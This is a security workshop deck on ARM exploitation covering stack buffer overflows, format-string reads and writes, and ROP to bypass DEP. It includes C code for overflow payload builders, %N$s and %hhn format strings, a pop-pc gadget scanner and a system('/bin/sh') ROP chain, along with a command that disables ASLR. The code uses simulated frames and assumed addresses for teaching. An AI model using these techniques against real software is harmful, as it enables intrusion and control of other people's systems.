Advanced ARM Exploitation
BSidesMaharastra Workshop
#whoami
● Ravi Rajput
● Chapter Lead of Null Ahmedabad
● Author at 1daylabs.ml
● Passionate and working in binary exploitation
● Ping me @infosecRavi
#whoami
● Himanshu Khokhar Jaat
● Independent Security Researcher
● Speaker, Instructor
● Love Exploit Development, Malware, Rootkits and RE
● Ping me @pwnrip
Agenda
1. Introduction to Memory Corruption
2. Taxonomy of Vulnerabilities
3. Introduction to Buffer Overflow
4. Practical Buffer Overflow Exploitation
5. Format String Exploitation
6. DEP Bypass and ROP
1. Introduction to Memory Corruption
Memory Corruption
● “Memory corruption occurs in a computer program when the contents of a memory location are
modified due to programmatic behavior that exceeds the intention of the original programmer or
program/language constructs; this is termed violating memory safety. The most likely cause of
memory corruption is programming error.” - Wikipedia
● Usually, the software crashes as the state of execution has been corrupted.
● In some cases, it can be leveraged to control execution of the program.
● This is what we are going to do today. :)
2. Taxonomy of Vulnerabilities
Taxonomy of Vulnerabilities
● Software bugs come in many shapes and sizes, and flavors too.
● Most commonly seen bugs are:
○ Buffer Overflows
■ Stack based buffer overflow
■ Heap based buffer overflow
○ Uninitialized variable exploitation
○ Use After Free
○ Format String bugs
○ Command Injection
○ Integer Overflows
3. Introduction to Buffer Overflows
Introduction to Buffer Overflow
● “A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a
buffer, overruns the buffer's boundary and overwrites adjacent memory locations.” - Wikipedia
● One of the most common (and probably the most exploited) classes of memory corruption bug.
● The classic public write-up of stack overflow exploitation is Aleph One's "Smashing the Stack for Fun and Profit" (Phrack 49, 1996).
● The simplest case is a function that copies input into a fixed-size buffer without checking the input's length: strcpy, gets, sprintf, or a memcpy whose length comes from the attacker.
Visualization of Buffer Overflow Attack - TechTarget
Demo: Visualizing stack corruption via buffer overflow
Exploit Mitigation Techniques on Linux
● As exploitation became common, compilers, linkers and the kernel grew mitigations that either remove a vulnerability class outright or make it much harder to exploit.
● The most common ones are:
○ SSP / Stack Canaries - The compiler places a random value between the local buffers and the saved registers (fp, lr); the epilogue checks it before returning and aborts the process if it changed. A linear overflow that reaches the saved return address has to pass over the canary.
○ ASLR - The kernel randomizes the base of the stack, heap, mmap regions and shared libraries on every execution, so addresses cannot be hard-coded (controlled system-wide by /proc/sys/kernel/randomize_va_space). On 32-bit targets the randomization has few bits of entropy, so brute force is often practical.
○ NX/DEP - Memory is either writable or executable, not both: the stack and heap are non-executable, so shellcode injected as data cannot be run in place.
○ RELRO - Relocation Read-Only. Partial RELRO makes the non-PLT part of the GOT read-only after loading; Full RELRO additionally resolves all dynamic symbols at load time (BIND_NOW) and makes the whole GOT read-only, which closes GOT-overwrite attacks.
○ PIE - The main executable is built position-independent so that ASLR can randomize its base as well; without PIE the binary's own code, GOT and data stay at fixed addresses even with ASLR on.
4. Practical Buffer Overflow Exploitation
Practical Buffer Overflow Exploitation
● As we saw, we can overwrite adjacent memory with data of our choice.
● On ARM the return address is held in lr. A non-leaf function's prologue pushes it (push {fp, lr}) and the epilogue pops it straight into pc (pop {fp, pc}). The saved lr lies on the stack above the local buffers, so a long enough write reaches it.
● Whatever we place there is loaded into pc on return, so we choose the next instruction that gets executed.
● Note: pc must point to a valid, executable address, in the right mode (bit 0 clear for ARM, set for Thumb), or the process crashes with SIGSEGV/SIGILL.
Demo: Overwriting saved PC to hijack process execution
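The corruption the two demos above show, as an added example that is not from the workshop slides. The struct is a hypothetical model of a 32-bit ARM frame (push {fp, lr} followed by a 16-byte local buffer) so the overwrite can be watched in a plain C program on any host; the layout, the 0x00010400 "legitimate" return address and the 0x41414141 target value are assumptions, and a real compiler may insert a canary or reorder locals.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Simulated 32-bit ARM stack frame (hypothetical layout).  A typical prologue is
 *     push {fp, lr}        ; save frame pointer and return address
 *     sub  sp, sp, #16     ; room for a 16-byte local buffer
 * so the buffer sits at lower addresses than the saved fp/lr, and the
 * epilogue "pop {fp, pc}" loads whatever is in saved_lr into pc.
 */
struct frame {
    char     buf[16];      /* local buffer, lowest address           */
    uint32_t saved_fp;     /* pushed fp                              */
    uint32_t saved_lr;     /* pushed lr, popped into pc on return    */
};

#define LR_OFFSET offsetof(struct frame, saved_lr)   /* 20 bytes */

/* Vulnerable: the copy length is the attacker's, not the buffer's.
 * Everything past buf[15] lands on saved_fp and then saved_lr. */
void vuln_copy(struct frame *f, const uint8_t *in, size_t len)
{
    memcpy((uint8_t *)f, in, len);                  /* no bound check */
}

/* Fixed: the copy is bounded by the buffer and always NUL-terminated. */
void safe_copy(struct frame *f, const uint8_t *in, size_t len)
{
    size_t n = len < sizeof f->buf - 1 ? len : sizeof f->buf - 1;
    memcpy(f->buf, in, n);
    f->buf[n] = '\0';
}

/* Classic payload: filler up to saved_lr, then the value we want in pc,
 * little-endian.  On ARM a value with bit 0 set switches to Thumb mode.
 * Returns the payload length, or 0 if the output buffer is too small. */
size_t build_payload(uint8_t *out, size_t cap, uint32_t new_pc)
{
    if (cap < LR_OFFSET + 4)
        return 0;
    memset(out, 'A', LR_OFFSET);
    out[LR_OFFSET + 0] = (uint8_t)(new_pc);
    out[LR_OFFSET + 1] = (uint8_t)(new_pc >> 8);
    out[LR_OFFSET + 2] = (uint8_t)(new_pc >> 16);
    out[LR_OFFSET + 3] = (uint8_t)(new_pc >> 24);
    return LR_OFFSET + 4;
}

/* Feed the payload to one copy routine and return what saved_lr holds
 * afterwards, i.e. what the epilogue would pop into pc. */
uint32_t lr_after_copy(int use_safe, uint32_t new_pc)
{
    struct frame f;
    uint8_t payload[64];
    size_t n = build_payload(payload, sizeof payload, new_pc);

    memset(&f, 0, sizeof f);
    f.saved_fp = 0xbefff000u;        /* assumed original frame pointer  */
    f.saved_lr = 0x00010400u;        /* assumed legitimate return address */
    if (use_safe)
        safe_copy(&f, payload, n);
    else
        vuln_copy(&f, payload, n);
    return f.saved_lr;
}

int main(void)
{
    printf("saved lr after vuln_copy: 0x%08x\n", lr_after_copy(0, 0x41414141u));
    printf("saved lr after safe_copy: 0x%08x\n", lr_after_copy(1, 0x41414141u));
    return 0;
}
```

To reproduce it for real on an ARM board, build a strcpy-based version without the mitigations the previous slide lists (gcc -fno-stack-protector -z execstack -no-pie), turn ASLR off with `echo 0 > /proc/sys/kernel/randomize_va_space`, and compare the saved lr in gdb before and after the epilogue.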
Practical Buffer Overflow Exploitation
● So far, we control the flow of execution.
● But what if we want to execute our own shellcode?
● We place the shellcode inside the same input that overflows the buffer and point pc at it. That needs an executable stack (no NX), a predictable stack address (no ASLR, or a leak), and shellcode assembled for the mode (ARM or Thumb) that the overwritten pc selects.
Demo: Getting shell through buffer overflow
5. Format String Exploitation
Introduction to Format Strings
● A format string is a string containing conversion specifiers (%d, %x, %s, %n, ...) that tell the function how to interpret the arguments that follow it.
● Used by the printf family: printf, fprintf, sprintf, snprintf, vprintf and friends, and also syslog().
Format Specifiers in C/C++ - cplusplus.com
Introduction to Format String Vulnerability
● A format string vulnerability occurs when attacker-controlled input is passed as the format argument itself, printf(buf) instead of printf("%s", buf), so the attacker's specifiers are interpreted.
● With crafted specifiers the attacker can read registers and stack contents (%x, %p), read any address (%s), and write arbitrary values to memory (%n) to control execution. gcc's -Wformat-security flags the dangerous call pattern at compile time.
Demo: Understanding Format String Vulnerability
Reading Arbitrary Memory using Format Strings
● As we saw, each %x consumes the "next argument". On 32-bit ARM (AAPCS) the first three come from r1-r3; after that printf walks up the stack one word at a time, so a run of %x leaks stack contents. %N$x selects argument N directly.
● But what if the data we want is not on the stack?
● We put the target address at the start of our input (which itself lives on the stack), find its argument position by probing with %x, then use %N$s: printf dereferences "argument" N as a char pointer and prints what is at our address. Caveat: a NUL byte inside the address terminates the input string.
Demo: Reading Arbitrary Memory using Format Strings
Writing Arbitrary Memory using Format Strings
● Reading is nice, but it doesn’t let us control anything.
● What if we could change anything in memory?
● Fortunately, %n writes the number of bytes printed so far to the address given as its argument, though it is not as simple as it seems: the value stored is whatever the count happens to be, so we adjust it with field widths, and we write one byte (%hhn) or halfword (%hn) at a time to avoid printing gigabytes.
Demo: Writing Arbitrary Memory using Format Strings
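The three demos above (the bug, the read, the write) in code, as an added example that is not from the slides. log_vuln and log_safe show the bug and its fix; build_read_fmt lays out the %N$s read; pad_for_byte does the %hhn arithmetic and hhn_demo checks it with a real %hhn against a literal format (the legitimate use, so it also runs under _FORTIFY_SOURCE). The argument position 7 and the address 0x7efff4c4 are assumptions, not values from any real target.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* gcc/clang -Wformat-security warns on exactly the call in log_vuln; the
 * pragma only keeps this deliberately vulnerable demo building under -Werror. */
#pragma GCC diagnostic ignored "-Wformat-security"

/* Vulnerable: the user string IS the format.  On ARM "%x %x %x %x" prints
 * r1, r2, r3 and then the first stack word; "%n" writes to memory. */
void log_vuln(const char *user)
{
    printf(user);
}

/* Fixed: the format is a literal, user input is only ever data. */
void log_safe(const char *user)
{
    printf("%s", user);
}

/* Arbitrary read: the target address goes first so it is at the start of
 * our buffer on the stack, then "%<pos>$s" makes printf dereference
 * argument number <pos> as a char pointer.  <pos> is found beforehand by
 * probing with %x until our own marker bytes show up.  Caveat: a NUL byte
 * inside the address terminates the string.  Returns the length built. */
size_t build_read_fmt(char *out, size_t cap, uint32_t addr, unsigned pos)
{
    if (cap < 4 + 16) return 0;
    out[0] = (char)addr;         out[1] = (char)(addr >> 8);
    out[2] = (char)(addr >> 16); out[3] = (char)(addr >> 24);
    return 4 + (size_t)snprintf(out + 4, cap - 4, "%%%u$s", pos);
}

/* The %n arithmetic: %hhn stores (bytes printed so far) & 0xff, so to store
 * `want` after `already` bytes have been emitted we need a field width that
 * makes the total congruent to `want` mod 256.  A width of 0 still prints
 * one character, so a zero difference needs a full 256-byte pad. */
unsigned pad_for_byte(unsigned already, unsigned char want)
{
    unsigned w = (want - already) & 0xffu;
    return w ? w : 256u;
}

/* Check the arithmetic with a real %hhn.  The format is a literal here
 * (the legitimate use of %n); only the width is computed.  `prefix` stands
 * in for whatever the format already printed.  Returns the byte stored. */
unsigned char hhn_demo(unsigned already, unsigned char want)
{
    char prefix[64], buf[512];
    signed char stored = 0;
    if (already >= sizeof prefix) return 0;
    memset(prefix, 'x', already);
    prefix[already] = '\0';
    snprintf(buf, sizeof buf, "%s%*c%hhn", prefix,
             (int)pad_for_byte(already, want), 'p', &stored);
    return (unsigned char)stored;
}

int main(void)
{
    char fmt[32];
    size_t n = build_read_fmt(fmt, sizeof fmt, 0x7efff4c4u, 7);
    printf("read format (%zu bytes): <4 address bytes>%s\n", n, fmt + 4);
    printf("to store 0x05 after 10 bytes: width %u -> stored 0x%02x\n",
           pad_for_byte(10, 5), hhn_demo(10, 5));
    log_safe("%x %x %x (printed as data, not interpreted)\n");
    return 0;
}
```

A full 32-bit write is four such %hhn conversions, each aimed at the next byte of the target address and each computed from the running count of the previous ones; on ARM the first three "arguments" are registers, so the addresses usually have to be placed where the stack walk, not r1-r3, will find them.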
6. DEP Bypass and ROP
Buffer Overflows revisited
● We already saw how to exploit buffer overflows.
● But usually, there are mitigations that protect applications from such attacks.
● NX/DEP is one of the most common: every modern toolchain and kernel enables it by default, and the stack is non-executable unless the binary is explicitly linked with an executable-stack marking (-z execstack).
● Let’s see how DEP affects our exploitation strategy.
Demo: Exploiting Buffer Overflow under DEP
DEP Bypass Strategy
● As we confirmed, we cannot execute our payload from the stack: the shellcode is there, pc reaches it, and the process dies with SIGSEGV on the first instruction fetch.
● DEP does not allow execution of content from non-executable memory.
● But we can still corrupt the stack, and we still control pc.
● How can we get a shell if we cannot execute anything from the stack? By executing code that is already there and already executable: libc and the binary itself.
Welcome to Return Oriented Programming
Return Oriented Programming
● ROP works on the simple fact that we still control pc.
● Since we control the stack, we control every value that is later popped into pc, so we can chain several returns one after another.
● The idea is to find gadgets, short instruction sequences already present in executable code, and string them together so that their side effects add up to what our shellcode would have done (for example r0 = address of "/bin/sh", then pc = system()).
● A gadget is a sequence of instructions ending in a control transfer we steer from the stack: pop {..., pc} in ARM context (the counterpart of x86 ret), or bx lr / blx rX with a register we loaded earlier. On ARM a single pop {r0, pc} already sets the first argument and returns.
Demo: Finding ROP Gadgets with Ropper
Demo: Creating ROP Chain to bypass DEP
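The two demos above, finding pop {..., pc} gadgets and laying out a chain, as an added example that is not from the slides and not Ropper's code. The scanner decodes the two encodings a gadget finder looks for on 32-bit ARM (ARM LDMIA sp!, {..., pc} = 0xE8BD8000 | reglist, Thumb 16-bit POP {..., pc} = 0xBD00 | reglist) over a constructed byte blob; the blob, the 20-byte pad and the gadget, "/bin/sh" and system() addresses are assumptions, not values from any real binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed values for the chain (illustration, not from any real target). */
#define PAD          20u          /* bytes from buffer start to saved lr   */
#define POP_R0_PC    0x00010400u  /* address of a "pop {r0, pc}" gadget     */
#define BINSH_ADDR   0xb6f5a1c4u  /* "/bin/sh" inside libc                  */
#define SYSTEM_ADDR  0xb6e8b2d0u  /* system() inside libc                   */

struct gadget {
    size_t   offset;  /* byte offset in the code blob                 */
    int      thumb;   /* 1 = Thumb encoding, 0 = ARM encoding          */
    uint16_t regs;    /* registers popped before pc, bit i = r<i>      */
    int      nwords;  /* stack words the chain must supply before pc   */
};

static int popcount16(uint16_t v) { int n = 0; for (; v; v >>= 1) n += v & 1; return n; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Scan a little-endian code blob for "pop {..., pc}":
 *   ARM   LDMIA sp!, {reglist} = 0xE8BD0000 | reglist, gadget when bit 15 (pc) is set
 *   Thumb POP {reglist, pc}    = 0xBD00 | reglist (16-bit form; 32-bit POP.W not handled)
 * A real finder (Ropper) also disassembles backwards to list the instructions
 * before the pop.  Returns the number of gadgets stored in out (at most cap). */
size_t find_pop_pc(const uint8_t *code, size_t len, struct gadget *out, size_t cap)
{
    size_t n = 0, off;
    for (off = 0; off + 4 <= len && n < cap; off += 4) {        /* ARM: 4-byte aligned   */
        uint32_t insn = rd32(code + off);
        if ((insn & 0xFFFF8000u) == 0xE8BD8000u) {
            out[n].offset = off; out[n].thumb = 0;
            out[n].regs = insn & 0x7FFF; out[n].nwords = popcount16(insn & 0x7FFF); n++;
        }
    }
    for (off = 0; off + 2 <= len && n < cap; off += 2) {        /* Thumb: 2-byte aligned */
        uint16_t insn = rd16(code + off);
        if ((insn & 0xFF00u) == 0xBD00u) {
            out[n].offset = off; out[n].thumb = 1;
            out[n].regs = insn & 0xFF; out[n].nwords = popcount16(insn & 0xFF); n++;
        }
    }
    return n;
}

/* Lay out the chain: filler up to the saved lr, the gadget address (bit 0 set
 * for Thumb, so the pop into pc also switches mode), one word per register
 * the gadget pops, then the next address popped into pc. */
size_t build_chain(uint8_t *out, size_t cap, size_t pad, uint32_t gadget,
                   int thumb, const uint32_t *words, size_t nwords)
{
    size_t i, pos = pad;
    if (cap < pad + 4 * (nwords + 1)) return 0;
    memset(out, 'A', pad);
    wr32(out + pos, gadget | (thumb ? 1u : 0u)); pos += 4;
    for (i = 0; i < nwords; i++) { wr32(out + pos, words[i]); pos += 4; }
    return pos;
}

/* Constructed sample "text section" (not from a real binary). */
static const uint8_t sample_code[] = {
    0x01, 0x80, 0xBD, 0xE8,   /* pop {r0, pc}   ARM   */
    0x10, 0x80, 0xBD, 0xE8,   /* pop {r4, pc}   ARM   */
    0x1E, 0xFF, 0x2F, 0xE1,   /* bx lr          ARM   */
    0x01, 0xBD,               /* pop {r0, pc}   Thumb */
    0x70, 0x47,               /* bx lr          Thumb */
};

/* Offset of the i-th gadget found in the sample, or -1 past the end. */
long sample_gadget_offset(size_t i)
{
    struct gadget g[8];
    size_t n = find_pop_pc(sample_code, sizeof sample_code, g, 8);
    return i < n ? (long)g[i].offset : -1;
}

/* "pop {r0, pc}" -> system("/bin/sh"): r0 <- "/bin/sh", then pc <- system.
 * Returns the idx-th 32-bit word of the chain (0 past the end). */
uint32_t demo_chain_word(int thumb, size_t idx)
{
    uint8_t chain[64];
    uint32_t words[2] = { BINSH_ADDR, SYSTEM_ADDR };
    size_t len = build_chain(chain, sizeof chain, PAD, POP_R0_PC, thumb, words, 2);
    return idx * 4 + 4 <= len ? rd32(chain + idx * 4) : 0;
}

int main(void)
{
    struct gadget g[8];
    size_t i, n = find_pop_pc(sample_code, sizeof sample_code, g, 8);
    for (i = 0; i < n; i++)
        printf("0x%04zx %s pop {0x%04x, pc}: %d word(s) before pc\n",
               g[i].offset, g[i].thumb ? "thumb" : "arm  ", g[i].regs, g[i].nwords);
    for (i = 0; i < 8; i++) printf("chain[%zu] = 0x%08x\n", i, demo_chain_word(0, i));
    return 0;
}
```

The chain never executes anything on the stack: the stack only supplies data that pop {r0, pc} consumes, so NX is irrelevant. The chosen gadget must be reachable (its address must not contain bytes the vulnerable copy stops at, such as NUL for strcpy), and under ASLR the libc addresses have to come from a leak, for instance the %x read from the previous section.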
Thank you
:D
